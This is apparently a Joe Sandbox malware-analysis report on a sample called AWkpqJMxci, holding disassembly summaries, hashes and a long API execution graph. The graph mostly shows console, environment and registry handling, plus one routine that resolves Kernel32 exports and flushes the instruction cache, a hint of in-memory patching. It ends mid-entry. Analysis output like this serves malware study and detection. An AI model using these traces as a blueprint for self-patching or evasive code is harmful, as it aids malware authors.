                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,028983C2), ref: 028983A4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                            • String ID: FlushInstructionCache$Kernel32
                                                                            • API String ID: 3811539418-184458249
                                                                            • Opcode ID: 7dd6729531eec8def7a0ad063833b75cc1cff76641a5eebaa273a7a0ca00b0aa
                                                                            • Instruction ID: 768ec5e94a0b5cf994670b9060ffe30012908c8c886437fbcd1de70df84f64eb
                                                                            • Opcode Fuzzy Hash: 7dd6729531eec8def7a0ad063833b75cc1cff76641a5eebaa273a7a0ca00b0aa
                                                                            • Instruction Fuzzy Hash: E5014B7D64430AAFEF00EEE8EC41B9A77EDEB0AB10F554460B900D6640D674BD109A26
                                                                            Function 0289AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289AF58
                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 0289AF88
                                                                            • IsBadReadPtr.KERNEL32(?,00000008), ref: 0289AFA7
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289AFB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Read$Write
                                                                            • String ID:
                                                                            • API String ID: 3448952669-0
                                                                            • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                            • Instruction ID: ef75cd2a39c1d0998c64f650c4c15ca601c6d9588874f2e7a91d3212484b4d2e
                                                                            • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                            • Instruction Fuzzy Hash: 6421B1BE64061A9BDF14DF69CC80BAE73A9EF80322F048511FD14E7781E734E8118AA0

                                                                            Execution Graph

                                                                            Execution Coverage:4%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0.6%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:11
                                                                            execution_graph 23549 b268e0 23550 b268f1 23549->23550 23551 b268fc 23549->23551 23555 b25679 23550->23555 23553 b25679 466 API calls 23551->23553 23554 b268f6 23553->23554 23580 b171a8 23555->23580 23557 b25685 RegOpenKeyExW 23558 b25780 23557->23558 23559 b256bb 23557->23559 23558->23554 23560 b0bc30 448 API calls 23559->23560 23561 b256cd 23560->23561 23562 b256da 23561->23562 23563 b10060 5 API calls 23561->23563 23581 b257a8 23562->23581 23565 b256ed 23563->23565 23566 b0acb0 448 API calls 23565->23566 23568 b256f4 23566->23568 23568->23562 23572 b25711 23568->23572 23573 b256e4 23568->23573 23570 b25716 23571 b078e4 448 API calls 23570->23571 23571->23573 23572->23570 23574 b10060 5 API calls 23572->23574 23632 b25799 23573->23632 23575 b25737 23574->23575 23576 b0acb0 448 API calls 23575->23576 23577 b2573e 23576->23577 23577->23570 23577->23573 23578 b25759 23577->23578 23609 b264db 23578->23609 23580->23557 23582 b258af 23581->23582 23596 b257d0 23581->23596 23583 b0ab7f 2 API calls 23582->23583 23585 b258b6 23583->23585 23584 b257da RegEnumKeyExW 23589 b25892 23584->23589 23584->23596 23586 b0acb0 448 API calls 23585->23586 23588 b258bd 23586->23588 23588->23589 23592 b101f5 wcsrchr 23588->23592 23590 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 23589->23590 23593 b25946 23590->23593 23591 b25885 GetLastError 23595 b078e4 448 API calls 23591->23595 23594 b258cd 23592->23594 23593->23573 23597 b262b3 453 API calls 23594->23597 23595->23589 23596->23584 23596->23589 23596->23591 23598 b09950 448 API calls 23596->23598 23599 b0dc60 2 API calls 23596->23599 23637 b262b3 23596->23637 23600 b258df 23597->23600 23598->23596 23599->23596 23601 b25913 23600->23601 23604 b25903 23600->23604 23602 b078e4 448 API calls 23601->23602 23603 b2590f 23602->23603 23605 b0dc60 2 API calls 23603->23605 23606 b09950 448 API calls 23604->23606 23607 b25930 23605->23607 23606->23603 23608 b0dc60 2 API calls 23607->23608 23608->23589 23610 b264e7 23609->23610 23611 b2658c RegDeleteKeyExW 23610->23611 23612 b26502 RegCreateKeyExW 23610->23612 23613 b2656b 23611->23613 23614 b2659f RegOpenKeyExW 23611->23614 23615 b26573 23612->23615 23616 b2651e RegSetValueExW RegCloseKey 23612->23616 23617 b172ef ApiSetQueryApiSetPresence 23613->23617 23623 b26601 23613->23623 23618 b265cc RegDeleteValueW 23614->23618 23619 b265bc 23614->23619 23622 b078e4 448 API calls 23615->23622 23616->23615 23628 b2655d 23616->23628 23617->23623 23620 b265e3 23618->23620 23621 b265ec RegCloseKey 23618->23621 23619->23613 23624 b078e4 448 API calls 23619->23624 23626 b078e4 448 API calls 23620->23626 23621->23613 23627 b2657a 23622->23627 23623->23573 23624->23613 23629 b265ea 23626->23629 23630 b078e4 448 API calls 23627->23630 23631 b09950 448 API calls 23628->23631 23629->23621 23630->23613 23631->23613 23633 b0dc60 2 API calls 23632->23633 23634 b257a0 23633->23634 23635 b0dc60 2 API calls 23634->23635 23636 b25775 RegCloseKey 23635->23636 23636->23558 23638 b262bf 23637->23638 23639 b262f3 RegQueryValueExW 23638->23639 23640 b262dd RegOpenKeyExW 23638->23640 23641 b2630c 23639->23641 23642 b2631d 23639->23642 23640->23639 23653 b262f0 SetLastError 23640->23653 23643 b0acb0 448 API calls 23641->23643 23646 b0dcd0 448 API calls 23642->23646 23642->23653 23645 b26316 23643->23645 23654 b26387 23645->23654 23647 b26329 23646->23647 23648 b26332 RegQueryValueExW 23647->23648 23647->23653 23648->23645 23650 b2634c 23648->23650 23652 b0dc60 2 API calls 23650->23652 23652->23653 23653->23645 23655 b2636f 23654->23655 23656 b2638c RegCloseKey 23654->23656 23655->23596 23656->23655 18421 b16ec0 SetUnhandledExceptionFilter 24821 b26910 24822 b26921 24821->24822 24823 b2692c 24821->24823 24827 b25e03 24822->24827 24825 b25e03 465 API calls 24823->24825 24826 b26926 24825->24826 24850 b171a8 24827->24850 24829 b25e0f RegOpenKeyExW 24830 b25f03 24829->24830 24831 b25e45 24829->24831 24830->24826 24832 b0bc30 448 API calls 24831->24832 24833 b25e57 24832->24833 24834 b10060 5 API calls 24833->24834 24842 b25e64 24833->24842 24836 b25e77 24834->24836 24837 b0acb0 448 API calls 24836->24837 24840 b25e7e 24837->24840 24838 b25e6e 24920 b25f1c 24838->24920 24840->24838 24840->24842 24845 b25e9b 24840->24845 24851 b25948 24842->24851 24843 b25ea0 24844 b078e4 448 API calls 24843->24844 24844->24838 24845->24843 24846 b0acb0 448 API calls 24845->24846 24847 b25ec1 24846->24847 24847->24838 24847->24843 24848 b25edc 24847->24848 24889 b26650 24848->24889 24850->24829 24852 b25af8 24851->24852 24872 b25970 24851->24872 24854 b25b16 24852->24854 24855 b25afe 24852->24855 24853 b25990 RegEnumKeyExW 24860 b25ae7 24853->24860 24853->24872 24856 b0ab7f 2 API calls 24854->24856 24857 b078e4 448 API calls 24855->24857 24858 b25b1d 24856->24858 24857->24860 24859 b0acb0 448 API calls 24858->24859 24861 b25b24 24859->24861 24862 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 24860->24862 24861->24860 24864 b101f5 wcsrchr 24861->24864 24863 b25c52 24862->24863 24863->24838 24866 b25b3c 24864->24866 24865 b262b3 453 API calls 24865->24872 24868 b25b68 24866->24868 24874 b25b7f 24866->24874 24867 b25ae2 24869 b16c78 4 API calls 24867->24869 24870 b078e4 448 API calls 24868->24870 24869->24860 24873 b25b74 24870->24873 24871 b0dc60 2 API calls 24871->24872 24872->24853 24872->24860 24872->24865 24872->24867 24872->24871 24872->24872 24877 b09950 448 API calls 24872->24877 24876 b0dc60 2 API calls 24873->24876 24875 b25b9e RegOpenKeyExW 24874->24875 24878 b25bd6 24875->24878 24879 b25bc4 24875->24879 24876->24860 24877->24872 24881 b262b3 453 API calls 24878->24881 24880 b078e4 448 API calls 24879->24880 24880->24873 24882 b25be7 24881->24882 24883 b25c21 24882->24883 24887 b25c13 24882->24887 24884 b078e4 448 API calls 24883->24884 24885 b25c1f 24884->24885 24886 b0dc60 2 API calls 24885->24886 24886->24873 24888 b09950 448 API calls 24887->24888 24888->24885 24890 b26680 24889->24890 24890->24890 24891 b2669b 24890->24891 24898 b266b0 24890->24898 24892 b078e4 448 API calls 24891->24892 24906 b266a6 24892->24906 24893 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 24894 b268da 24893->24894 24894->24838 24895 b26729 RegOpenKeyExW 24896 b26831 24895->24896 24897 b26755 24895->24897 24899 b2689c RegDeleteValueW 24896->24899 24904 b2683c RegSetValueExW 24896->24904 24900 b2681c 24897->24900 24912 b26768 24897->24912 24898->24895 24901 b268bf RegCloseKey 24899->24901 24902 b268af 24899->24902 24903 b078e4 448 API calls 24900->24903 24901->24906 24905 b078e4 448 API calls 24902->24905 24903->24906 24909 b26873 24904->24909 24910 b26881 24904->24910 24919 b2687f 24905->24919 24906->24893 24908 b267a4 RegCreateKeyExW 24911 b26801 24908->24911 24908->24912 24913 b09950 448 API calls 24909->24913 24914 b078e4 448 API calls 24910->24914 24916 b078e4 448 API calls 24911->24916 24912->24896 24912->24908 24915 b267ea RegCloseKey 24912->24915 24913->24919 24917 b2688a 24914->24917 24915->24912 24916->24906 24918 b078e4 448 API calls 24917->24918 24918->24919 24919->24901 24921 b0dc60 2 API calls 24920->24921 24922 b25f23 24921->24922 24923 b0dc60 2 API calls 24922->24923 24924 b25ef8 RegCloseKey 24923->24924 24924->24830 18422 b16903 18423 b1690f 18422->18423 18424 b16934 18423->18424 18425 b1693b Sleep 18423->18425 18426 b16953 _amsg_exit 18424->18426 18428 b1695d 18424->18428 18425->18423 18426->18428 18427 b1699f _initterm 18431 b169ba __IsNonwritableInCurrentImage 18427->18431 18428->18427 18429 b16980 18428->18429 18428->18431 18436 b109b1 GetCurrentThreadId OpenThread 18431->18436 18495 b0e2af 18436->18495 18438 b109e8 HeapSetInformation RegOpenKeyExW 18439 b1e9c5 RegQueryValueExW RegCloseKey 18438->18439 18440 b10a18 18438->18440 18442 b1e9f5 18439->18442 18505 b11f5b 18440->18505 18658 b063bd 18442->18658 18446 b10a41 18518 b087ca 8 API calls 18446->18518 18451 b1ea08 18480 b10a87 18451->18480 18673 b11e70 18451->18673 18454 b1ea58 _setjmp3 18456 b1ea82 18454->18456 18457 b1ea6f 18454->18457 18459 b1eaa4 18456->18459 18462 b063bd 448 API calls 18456->18462 18457->18456 18458 b1ea73 18457->18458 18461 b11e70 448 API calls 18458->18461 18468 b1ea3c 18458->18468 18679 b0dd98 _get_osfhandle GetFileType 18459->18679 18461->18458 18465 b1ea92 18462->18465 18463 b1ea52 18463->18454 18464 b1eab1 18466 b1eab5 _setmode 18464->18466 18467 b1eac6 18464->18467 18469 b24840 453 API calls 18465->18469 18466->18467 18684 b162c0 18467->18684 18472 b1ea9a 18469->18472 18472->18459 18473 b11e70 448 API calls 18472->18473 18473->18472 18474 b1eacc EnterCriticalSection LeaveCriticalSection 18477 b0c570 581 API calls 18474->18477 18476 b10ada exit 18476->18480 18482 b1eafa 18477->18482 18479 b11e70 448 API calls 18479->18480 18480->18463 18480->18476 18480->18479 18481 b1ea32 18480->18481 18584 b0e310 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 18480->18584 18593 b0c570 18480->18593 18609 b0e470 18480->18609 18481->18468 18485 b11e70 448 API calls 18481->18485 18482->18474 18486 b1eb75 18482->18486 18487 b1eb06 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo 18482->18487 18483 b0e2af 4 API calls 18483->18480 18485->18481 18486->18468 18488 b11e70 448 API calls 18486->18488 18489 b0e2af 4 API calls 18487->18489 18488->18486 18490 b1eb40 18489->18490 18491 b0e470 918 API calls 18490->18491 18492 b0e310 12 API calls 18490->18492 18491->18490 18493 b1eb54 GetConsoleOutputCP GetCPInfo 18492->18493 18494 b0e2af 4 API calls 18493->18494 18494->18482 18496 b0e2ca 18495->18496 18497 b0e2bc SetThreadUILanguage 18495->18497 18498 b0e2d4 GetModuleHandleW 18496->18498 18499 b0e2ef 18496->18499 18497->18438 18498->18499 18501 b0e307 18498->18501 18499->18501 18502 b0e2f3 GetProcAddress 18499->18502 18501->18497 18503 b0e30b SetThreadLocale 18501->18503 18502->18501 18503->18438 18506 b11f91 18505->18506 18510 b10a31 18505->18510 18507 b11fab VirtualQuery 18506->18507 18506->18510 18509 b11fbd 18507->18509 18507->18510 18508 b11fc7 VirtualQuery 18508->18509 18508->18510 18509->18508 18509->18510 18511 b11f1a GetConsoleOutputCP GetCPInfo 18510->18511 18512 b1f185 GetThreadLocale 18511->18512 18513 b11f39 memset 18511->18513 18515 b1f196 18512->18515 18514 b11f5a 18513->18514 18513->18515 18514->18446 18516 b1f20b 18515->18516 18517 b1f1ee memset 18515->18517 18516->18446 18517->18515 18519 b0e310 12 API calls 18518->18519 18520 b0884f 18519->18520 18715 b0a9d4 GetEnvironmentStringsW 18520->18715 18524 b0885e 18729 b08273 18524->18729 18527 b08873 18527->18527 18528 b08b2f 18527->18528 18751 b11a05 18527->18751 18530 b078e4 448 API calls 18528->18530 18532 b08b42 18530->18532 19050 b17d18 18532->19050 18533 b088a5 GetCommandLineW 18534 b088b8 18533->18534 18756 b0e3f0 18534->18756 18539 b088e1 18767 b08e9e 18539->18767 18585 b0e343 18584->18585 18586 b0e357 _get_osfhandle GetConsoleMode 18584->18586 18585->18586 18587 b0e3bc _get_osfhandle SetConsoleMode 18585->18587 18588 b0e372 18586->18588 18591 b0e3a0 GetConsoleOutputCP GetCPInfo 18586->18591 18587->18586 18590 b0e3df 18587->18590 18589 b0e381 _get_osfhandle SetConsoleMode 18588->18589 18588->18591 18589->18591 18590->18586 18592 b1dc1d _get_osfhandle SetConsoleMode 18590->18592 18591->18483 18592->18586 18594 b0c5d3 18593->18594 18595 b0c594 18593->18595 18597 b0c695 VirtualFree 18594->18597 18598 b0c5fe _setjmp3 18594->18598 18595->18594 18596 b0c59e GetProcessHeap RtlFreeHeap 18595->18596 18596->18594 18596->18595 18597->18594 18600 b0c666 18597->18600 18599 b0c63c 18598->18599 18605 b0c683 18598->18605 20233 b0a8c4 18599->20233 18602 b0c66f 18600->18602 20253 b28959 18600->20253 18602->18605 20262 b28791 18602->20262 18603 b0c64d 18603->18602 20244 b0cc70 18603->20244 18605->18480 18607 b1d0f0 18607->18607 18610 b0e48a 18609->18610 18611 b0e517 18609->18611 18610->18611 18612 b0e4cc 18610->18612 18613 b0e4ae memset 18610->18613 18611->18480 18615 b0e5ad 18612->18615 18616 b0e501 18612->18616 18621 b0e4d9 18612->18621 20933 b0e670 18613->20933 18619 b0dcd0 448 API calls 18615->18619 18616->18611 18629 b0e670 457 API calls 18616->18629 18617 b0e572 20966 b09ef2 memset 18617->20966 18618 b0e4e9 18623 b0e531 18618->18623 18624 b0e4ef 18618->18624 18620 b0e5b7 18619->18620 18620->18616 18630 b0e627 18620->18630 21071 b0ed90 18620->21071 18621->18617 18621->18618 18626 b0e544 18623->18626 18627 b0e55f 18623->18627 20860 b0ad60 GetConsoleTitleW 18624->20860 18632 b0e588 18626->18632 18633 b0e54c 18626->18633 20961 b0ab50 18627->20961 18629->18611 21105 b157ea 18630->21105 18631 b0e583 18631->18616 21016 b10390 18632->21016 18638 b0e592 18633->18638 18639 b0e554 18633->18639 18643 b0e4f6 18638->18643 21019 b10740 18638->21019 20948 b103b0 18639->20948 18641 b0e631 18641->18616 18648 b0dcd0 448 API calls 18641->18648 18643->18616 18644 b0a125 2 API calls 18643->18644 18644->18616 18645 b0e5dd 18647 b0f410 464 API calls 18645->18647 18649 b0e5eb 18647->18649 18650 b0e641 18648->18650 18649->18630 18651 b0e5f0 18649->18651 18650->18616 18652 b0e64b 18650->18652 18653 b09ef2 459 API calls 18651->18653 18654 b0ec2e 448 API calls 18652->18654 18655 b0e5f9 18653->18655 18654->18651 18655->18616 21075 b12081 18655->21075 18659 b0790c 448 API calls 18658->18659 18660 b063dc 18659->18660 18661 b24840 GetStdHandle 18660->18661 18662 b063bd 448 API calls 18661->18662 18663 b2485e 18662->18663 18664 b248c5 18663->18664 18666 b0dd98 6 API calls 18663->18666 18665 b09950 448 API calls 18664->18665 18667 b248cf 18665->18667 18668 b2486b 18666->18668 18667->18451 18669 b248b5 18668->18669 18670 b24878 FlushConsoleInputBuffer _getch 18668->18670 18671 b24799 448 API calls 18669->18671 18670->18664 18672 b24891 EnterCriticalSection LeaveCriticalSection 18670->18672 18671->18664 18672->18664 22556 b11ea6 18673->22556 18675 b11e7c 18676 b11e82 18675->18676 18677 b08bc7 446 API calls 18675->18677 18676->18451 18678 b11e92 GetProcessHeap RtlFreeHeap 18677->18678 18678->18676 18682 b0ddca 18679->18682 18683 b0ddbd 18679->18683 18680 b0ddd6 GetStdHandle 18681 b0ddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18680->18681 18681->18683 18682->18680 18682->18681 18683->18464 22564 b1643a NtOpenThreadToken 18684->22564 18687 b21ef3 RtlNtStatusToDosError SetLastError 18689 b21f01 18687->18689 18688 b16302 18688->18689 18690 b21f51 18688->18690 18691 b16319 18688->18691 18692 b0ab7f 2 API calls 18689->18692 18706 b21fdc 18689->18706 18694 b21f59 GetConsoleTitleW 18690->18694 22573 b1640a FormatMessageW 18691->22573 18714 b16395 18692->18714 18695 b21f79 wcsstr 18694->18695 18713 b163c1 18694->18713 18697 b21f92 18695->18697 18695->18713 18696 b163d8 18702 b163e2 LocalFree 18696->18702 18703 b163e9 18696->18703 18698 b21fa0 wcsstr 18697->18698 18698->18698 18698->18713 18699 b16332 18699->18696 18699->18699 18707 b21f3d 18699->18707 18710 b0dcd0 448 API calls 18699->18710 18700 b0dc60 2 API calls 18700->18696 18701 b078e4 448 API calls 18704 b21f4a 18701->18704 18702->18703 18705 b163f1 18703->18705 18703->18707 18704->18474 18708 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18705->18708 18707->18701 18711 b16400 18708->18711 18709 b163b4 SetConsoleTitleW 18709->18713 18712 b16369 18710->18712 18711->18474 18712->18694 18712->18696 18712->18714 18713->18696 18713->18700 18713->18706 18714->18707 18714->18709 18714->18713 18716 b0a9e6 18715->18716 18717 b08854 18715->18717 18718 b0a9ee GetProcessHeap RtlAllocateHeap 18716->18718 18721 b08b96 GetProcessHeap HeapAlloc 18717->18721 18719 b0aa11 FreeEnvironmentStringsW 18718->18719 18720 b0aa06 memcpy 18718->18720 18719->18717 18720->18719 18722 b08bb4 18721->18722 18728 b1b5ce 18721->18728 18723 b0a9d4 5 API calls 18722->18723 18724 b08bb9 18723->18724 18725 b1b5b2 GetProcessHeap RtlFreeHeap 18724->18725 18726 b08bc3 18724->18726 18727 b078e4 448 API calls 18725->18727 18726->18524 18727->18728 18728->18524 18747 b08282 18729->18747 18730 b082bd RegOpenKeyExW 18731 b082e1 RegQueryValueExW 18730->18731 18730->18747 18733 b08321 RegQueryValueExW 18731->18733 18731->18747 18732 b08552 time srand 18734 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18732->18734 18735 b08371 RegQueryValueExW 18733->18735 18733->18747 18736 b08570 GetCommandLineW 18734->18736 18738 b083ab RegQueryValueExW 18735->18738 18735->18747 18736->18527 18737 b1b11a _wtol 18737->18733 18740 b083fb RegQueryValueExW 18738->18740 18738->18747 18739 b1b146 _wtol 18739->18735 18741 b0846c RegQueryValueExW 18740->18741 18740->18747 18741->18747 18742 b1b18e _wtol 18742->18738 18743 b1b1ba wcstol 18743->18747 18744 b1b1dc wcstol 18744->18747 18745 b1b218 wcstol 18745->18747 18746 b084fa RegQueryValueExW 18746->18747 18748 b08534 RegCloseKey 18746->18748 18747->18730 18747->18732 18747->18733 18747->18735 18747->18737 18747->18738 18747->18739 18747->18740 18747->18741 18747->18742 18747->18743 18747->18744 18747->18745 18747->18746 18747->18748 18749 b1b28c ExpandEnvironmentStringsW 18747->18749 19054 b0acb0 18747->19054 18748->18747 18749->18747 19064 b16e25 18751->19064 18753 b11a27 18754 b0889a 18753->18754 18755 b11a2f memset 18753->18755 18754->18528 18754->18533 18755->18754 18757 b0e405 18756->18757 18758 b088d9 18756->18758 18759 b16e25 4 API calls 18757->18759 18758->18528 18758->18539 18760 b0e422 18759->18760 18761 b1dc4a 18760->18761 18762 b0e42d 18760->18762 19076 b234d4 18761->19076 18763 b0e441 memset 18762->18763 18764 b1dc6b ??_V@YAXPAX 18762->18764 18763->18758 18768 b08ec1 GetCurrentDirectoryW 18767->18768 18769 b08ede towupper 18767->18769 18774 b08ec9 18768->18774 19146 b0ec2e GetEnvironmentVariableW 18769->19146 18771 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18773 b088fc 18771->18773 18776 b100e9 memset 18773->18776 18774->18771 18775 b1b787 towupper 18777 b0e3f0 17 API calls 18776->18777 18778 b1013e 18777->18778 18779 b1e615 18778->18779 18780 b10146 18778->18780 18783 b11e70 448 API calls 18779->18783 18786 b1e61f exit 18779->18786 18781 b10151 GetModuleFileNameW 18780->18781 18782 b1e627 18780->18782 18784 b0ec2e 448 API calls 18781->18784 19288 b0a976 18782->19288 18783->18779 18785 b10168 18784->18785 18785->18782 18788 b10170 18785->18788 18786->18782 18790 b0ec2e 448 API calls 18788->18790 18789 b1e63e 18793 b0a976 8 API calls 18789->18793 18791 b1017c 18790->18791 18791->18789 18792 b10184 18791->18792 18794 b0ec2e 448 API calls 18792->18794 18795 b1e64f 18793->18795 18796 b10190 18794->18796 18798 b0a976 8 API calls 18795->18798 18796->18795 18797 b10198 18796->18797 18800 b1e660 18798->18800 19051 b17d1d 19050->19051 19052 b11e70 448 API calls 19051->19052 19053 b17d28 exit 19051->19053 19052->19051 19055 b0acc0 19054->19055 19055->19055 19058 b0dcd0 19055->19058 19057 b0acd8 19057->18747 19059 b1d9da 19058->19059 19060 b0dcde GetProcessHeap HeapAlloc 19058->19060 19062 b078e4 446 API calls 19059->19062 19060->19059 19061 b0dcf6 19060->19061 19061->19057 19063 b1d9e3 19062->19063 19063->19057 19065 b16e30 __EH_prolog3_catch 19064->19065 19068 b1742d 19065->19068 19067 b16e48 19067->18753 19069 b17441 malloc 19068->19069 19070 b17434 _callnewh 19069->19070 19071 b1744f 19069->19071 19070->19069 19072 b17451 19070->19072 19071->19067 19075 b174d1 ??0exception@@QAE@ABQBDH 19072->19075 19074 b177ec _CxxThrowException 19075->19074 19079 b2345e 19076->19079 19082 b232e4 19079->19082 19083 b232f6 19082->19083 19090 b22e74 19083->19090 19087 b233a9 19088 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19087->19088 19089 b233ba 19088->19089 19089->18758 19091 b22ea3 19090->19091 19092 b22ead 19090->19092 19091->19092 19093 b2345e 9 API calls 19091->19093 19094 b22f1d GetCurrentThreadId 19092->19094 19093->19092 19095 b22f6c 19094->19095 19096 b23061 19095->19096 19106 b22e37 19095->19106 19099 b22fe7 19099->19087 19102 b2392b 19099->19102 19100 b23036 OutputDebugStringW 19100->19099 19103 b23941 19102->19103 19104 b2394c memset 19102->19104 19103->19104 19105 b2397a 19104->19105 19107 b22e42 19106->19107 19108 b22e4e 19106->19108 19107->19108 19109 b22e5d IsDebuggerPresent 19107->19109 19108->19099 19108->19100 19110 b22859 19108->19110 19109->19108 19114 b22885 19110->19114 19120 b22a23 19110->19120 19111 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19112 b22a60 19111->19112 19112->19100 19113 b2290d FormatMessageW 19115 b22963 19113->19115 19116 b2294c 19113->19116 19114->19113 19114->19120 19118 b23067 _vsnwprintf 19115->19118 19139 b23067 19116->19139 19119 b2295e 19118->19119 19120->19111 19142 b09a8d 19139->19142 19143 b09a98 19142->19143 19147 b0ec64 19146->19147 19149 b08f0d 19146->19149 19148 b0ec71 _wcsicmp 19147->19148 19147->19149 19150 b0ed59 19148->19150 19151 b0ec87 _wcsicmp 19148->19151 19149->18774 19149->18775 19154 b08e9e 436 API calls 19150->19154 19152 b0ed47 19151->19152 19153 b0ec9d _wcsicmp 19151->19153 19195 b09abf 19152->19195 19153->19152 19155 b0ecb3 _wcsicmp 19153->19155 19156 b0ed6c 19154->19156 19157 b0ecc9 _wcsicmp 19155->19157 19158 b1ddef GetCommandLineW 19155->19158 19199 b06854 19156->19199 19157->19156 19160 b0ecdf _wcsicmp 19157->19160 19158->19149 19161 b0ecf1 _wcsicmp 19160->19161 19162 b0ed24 19160->19162 19164 b0ed07 _wcsicmp 19161->19164 19165 b1ddfa rand 19161->19165 19171 b09310 19162->19171 19164->19149 19167 b1de06 GetNumaHighestNodeNumber 19164->19167 19165->19152 19167->19152 19168 b0ed30 19168->19149 19238 b16c78 19168->19238 19172 b0933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19171->19172 19173 b093fe 19171->19173 19174 b1bbd9 19172->19174 19175 b0938d 19172->19175 19173->19168 19241 b248d7 19173->19241 19190 b1bbd1 19174->19190 19247 b08791 GetUserDefaultLCID 19174->19247 19177 b1bbcc 19175->19177 19178 b093cd 19175->19178 19182 b09950 441 API calls 19177->19182 19181 b09abf _vsnwprintf 19178->19181 19184 b093d6 19181->19184 19182->19190 19187 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19184->19187 19185 b09abf _vsnwprintf 19185->19190 19186 b1bd10 19187->19173 19190->19185 19190->19190 19192 b1bdbf 19190->19192 19249 b0998d 19190->19249 19192->19192 19193 b1bc11 19193->19186 19194 b1bcd0 memmove 19193->19194 19194->19193 19196 b09acd 19195->19196 19197 b09aee 19196->19197 19285 b09afb _vsnwprintf 19196->19285 19197->19150 19200 b06b0c 19199->19200 19201 b0688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19199->19201 19202 b248d7 6 API calls 19200->19202 19203 b068ec 19201->19203 19211 b1a562 19201->19211 19204 b1a4c2 19202->19204 19205 b08791 GetUserDefaultLCID 19203->19205 19204->19168 19206 b06906 GetLocaleInfoW 19205->19206 19224 b06915 19206->19224 19207 b06966 19210 b08791 GetUserDefaultLCID 19207->19210 19208 b1a5f9 19212 b09abf _vsnwprintf 19208->19212 19209 b1a5df realloc 19209->19208 19209->19211 19213 b0698e GetDateFormatW 19210->19213 19211->19208 19211->19209 19217 b078e4 434 API calls 19211->19217 19214 b1a62a 19212->19214 19215 b06a96 19213->19215 19216 b0699d 19213->19216 19220 b1a63e 19214->19220 19229 b1a64d 19214->19229 19218 b08791 GetUserDefaultLCID 19215->19218 19216->19215 19223 b069ab 19216->19223 19217->19211 19225 b09950 434 API calls 19220->19225 19223->19214 19224->19207 19228 b1a523 memmove 19224->19228 19230 b06a75 memmove 19224->19230 19234 b1a649 19225->19234 19228->19224 19233 b09950 434 API calls 19229->19233 19230->19224 19233->19234 19287 b16b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19238->19287 19240 